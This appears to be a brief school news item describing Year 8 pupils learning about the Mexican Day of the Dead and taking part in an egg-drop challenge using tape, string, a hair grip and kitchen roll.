    Die de Muertos – The Day of the Dead

    Year 8 have been learning about the Mexican holiday, where the lives of the dead are celebrated. It is not considered mourning or sad but a happy remembrance of loved ones. The sugar skull masks are used in the celebration, along with brightly coloured costumes and offerings to welcome back the spirits.

    Year 8 pupils were given a challenge to see if they could keep an egg intact when dropping it from above the whiteboard. They worked in teams and were only given cellotape, string, a hair grip and some kitchen roll.
